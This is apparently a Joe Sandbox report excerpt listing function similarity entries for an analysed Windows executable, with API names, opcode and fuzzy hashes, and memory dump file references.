                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: 15826074c8cb99ee856bf82be2d154b99849bfcdbc0a4cfbe6cc21ba25d64a22
                                                                                                      • Instruction ID: 66588fc6e6b52f1fd0b54e441ac8d71fb75dd2f899079d3274382ddeffaa5260
                                                                                                      • Opcode Fuzzy Hash: 15826074c8cb99ee856bf82be2d154b99849bfcdbc0a4cfbe6cc21ba25d64a22
                                                                                                      • Instruction Fuzzy Hash: 1731C47590122D9BCB21DF68D988BD8B7B4BF18310F5042EAE41CA7291E7709F918F44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                      • Instruction ID: 827042f2ad6f7ad8a57f276afc69ffe76cd1720302477809e5935c55edbb7797
                                                                                                      • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                      • Instruction Fuzzy Hash: 13021C71E012199FDF14CFA9C9806EEB7F1EF58324F25826AD919EB280D731A941CB91
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A09355
                                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2A154,?,?), ref: 00A093A4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatInfoLocaleNumber
                                                                                                      • String ID:
                                                                                                      • API String ID: 2169056816-0
                                                                                                      • Opcode ID: 00e5a4542e33cfeca142307c6931e462369ad56070ee108c4e84f87bacfccf0d
                                                                                                      • Instruction ID: 69b508413ef2eb63db19c434790f413f81c100088c6ed67e1fb70f35769cd633
                                                                                                      • Opcode Fuzzy Hash: 00e5a4542e33cfeca142307c6931e462369ad56070ee108c4e84f87bacfccf0d
                                                                                                      • Instruction Fuzzy Hash: DE01923A100309BBD720DFA4EC05FAB77BCEF49710F004522BA08E7161D3745926CB92
                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A1E8CF,?,?,00000008,?,?,00A1E56F,00000000), ref: 00A1EB01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: e0abb601fb8d698644b5e716c23e2b782859ebd9ea352d253699d3a0cf3f167b
                                                                                                      • Instruction ID: f35bbd2bc17ccacacb3613bc77e8ee8806661f6487f341c8543ac86a584a6524
                                                                                                      • Opcode Fuzzy Hash: e0abb601fb8d698644b5e716c23e2b782859ebd9ea352d253699d3a0cf3f167b
                                                                                                      • Instruction Fuzzy Hash: F5B15A31614608DFD719CF28C48ABA57BE1FF45365F298658E8DACF2A1C335E992CB40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 0-4203073231
                                                                                                      • Opcode ID: b60db5de12fe39e3d34ee515be8d7d452310f711f33efada73ddaab73a3fd2f7
                                                                                                      • Instruction ID: 84bd692b7a3d7f112b80f5229b648b1fe52505691be9f6f4ff5d8888df632ea7
                                                                                                      • Opcode Fuzzy Hash: b60db5de12fe39e3d34ee515be8d7d452310f711f33efada73ddaab73a3fd2f7
                                                                                                      • Instruction Fuzzy Hash: 9CF1B2B2A083418FD748CF29D880A1AFBE2BFC8208F15892EF5D8D7715D634E9558B56
                                                                                                      APIs
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 009FA905
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: 1938083b2a4d3892b6c62c516a313f5e942d551d5cb7622b335ece52cbb2d57d
                                                                                                      • Instruction ID: 111366df83cbceb741b304372865ccf94f44537a056ca7df265861a075f4f522
                                                                                                      • Opcode Fuzzy Hash: 1938083b2a4d3892b6c62c516a313f5e942d551d5cb7622b335ece52cbb2d57d
                                                                                                      • Instruction Fuzzy Hash: ADF0FFB490420C8BCB38CB58DC42AB97375A755320F2142B5EA1993350D2745D838F52
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,00A0D604), ref: 00A0DBC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 3c4a0ab7c146f4b383d5fb665f4dbc56070c5cb49682cfacecc4a4a00303f4f1
                                                                                                      • Instruction ID: ffeb1f5d2304e7a02d3fedeb3902dc982de11159da071989da0ddde6d9cdc91b
                                                                                                      • Opcode Fuzzy Hash: 3c4a0ab7c146f4b383d5fb665f4dbc56070c5cb49682cfacecc4a4a00303f4f1
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 7a5b23ea4fed0822db852561dfabbc75e100350a11982f440b96dd62cd6044ea
                                                                                                      • Instruction ID: 56a0de6c6ff27e2a6f5808698ff6898b943a1fd89aa57827444b9c41073f5358
                                                                                                      • Opcode Fuzzy Hash: 7a5b23ea4fed0822db852561dfabbc75e100350a11982f440b96dd62cd6044ea
                                                                                                      • Instruction Fuzzy Hash: E4A012341021008F6310CF7A5A052093594654228030040285004C5120D73080124600
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                      • Instruction ID: f8afe286fca26c8b3170354f240b7a96d3c68545ff1fbd6316e7b1189298c120
                                                                                                      • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                      • Instruction Fuzzy Hash: C1620A71A04B8D9FCB29CF38E8906BABBE1AF55304F04895DD99A4B382D634E945CF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                      • Instruction ID: 84d4ba404f95341cd279b7d826c5c2f7979bf93217e51edf076a7e1541f57c31
                                                                                                      • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                      • Instruction Fuzzy Hash: 7F62237060478A9FC719CF28D9906B9BBE0FF55308F14866ED9968B782D331E969CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                      • Instruction ID: b7e5632888df34c343209564a65f09c5e92a9b88f7ed31fc3dca36ff32d901e8
                                                                                                      • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                      • Instruction Fuzzy Hash: 2C5249B26087019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f7de9c02e8ecc9b93b8a149fd73c22a635c551f72c3788bec8c5d58790eefe0
                                                                                                      • Instruction ID: 6b398878acb744c4e8cea2c811058ec5bd33ea71146c7f94195c6584aa53f7c9
                                                                                                      • Opcode Fuzzy Hash: 2f7de9c02e8ecc9b93b8a149fd73c22a635c551f72c3788bec8c5d58790eefe0
                                                                                                      • Instruction Fuzzy Hash: 9D12B4B160470A8BC728CF28E5D06BAB3E1FF54308F14892DD597CBAC1D774A8A5CB45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e4edd9654fe20f280fead2a48d0be879652c6dd275281a35cd2e3ea45780e65
                                                                                                      • Instruction ID: cb441894bbc1d04cf0a8528b94e822146c8902b741b10504f8562fa441944767
                                                                                                      • Opcode Fuzzy Hash: 2e4edd9654fe20f280fead2a48d0be879652c6dd275281a35cd2e3ea45780e65
                                                                                                      • Instruction Fuzzy Hash: B9F187B2A083499BC714CE29C98467BBBEAFFC8714F144A2EF6D587355D730E9058B42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                      • Instruction ID: aaa5f1bfddab7937729fc0d00a1f852b0d833b1ccc90d0dfb5b9745c985758f3
                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                      • Instruction Fuzzy Hash: BCC1BF362051970EDF3D4739A53017EBEA15EA2BB131A077ED4B6EB8D4FE20C528D620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                      • Instruction ID: 41c6aa2eef69e5365dd1aece32f2be44821335f22d482279792bf70e97ad8e1a
                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                      • Instruction Fuzzy Hash: 66C1B2362091970EDF3D4739E53407EBEA15AA2BB131A077DD8B6EB8D5FE20C524D620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                      • Instruction ID: bafaf640805b65538e0586bcc82a427fe1b8d8275b71a0548e7c8d05c118c2d8
                                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                      • Instruction Fuzzy Hash: 76C1C1362051970EDF3D8739A93407EBEA15AA6BB131A077DD8B7DB8C4FE20D524D620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                      • Instruction ID: 56930491c85596ac652b6e9d936a9147fc736be183ff7b7e074e7bc5ef3e4bcf
                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                      • Instruction Fuzzy Hash: 48C19F362090970EDF3D873AE53407EBEA15AA6BB131A077DD4B7DB9C5FE20C5249620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9a7aebeebf5cf7884033684df96b26b1c562b382b5f58e9840083b50d8f991f8
                                                                                                      • Instruction ID: da4d8999e7f3b364928a18e8bc11732e2e4a1f2bd2c81ad1d1ce452b07e5aa9b
                                                                                                      • Opcode Fuzzy Hash: 9a7aebeebf5cf7884033684df96b26b1c562b382b5f58e9840083b50d8f991f8
                                                                                                      • Instruction Fuzzy Hash: 61E135755093848FC345CF69D89086ABBF1AFCA300F49096EF9D597362C234EA56CF62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                      • Instruction ID: 811a7d18427f101a172e3e5737e4d1bd1ce5cc41ecd8c47920773084b8e681ff
                                                                                                      • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                      • Instruction Fuzzy Hash: 1D915EB120474D8BDB24EF64E899BBE77D9AF90300F10092DE69B872C2DB74D954C752
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 617e12471b54a8be935912871670c9cc879771f884e11b54787977d524003093
                                                                                                      • Instruction ID: 2906c761a9c96dc7ed1d77b4a478c3c0c55c792f73bae07281e7d951e7fc943b
                                                                                                      • Opcode Fuzzy Hash: 617e12471b54a8be935912871670c9cc879771f884e11b54787977d524003093
                                                                                                      • Instruction Fuzzy Hash: 3861A87160830C66DF385F289A95BFF23A8EB51344F140919EA83DF281D611DEF28399
                                                                                                      Memory Dump Source
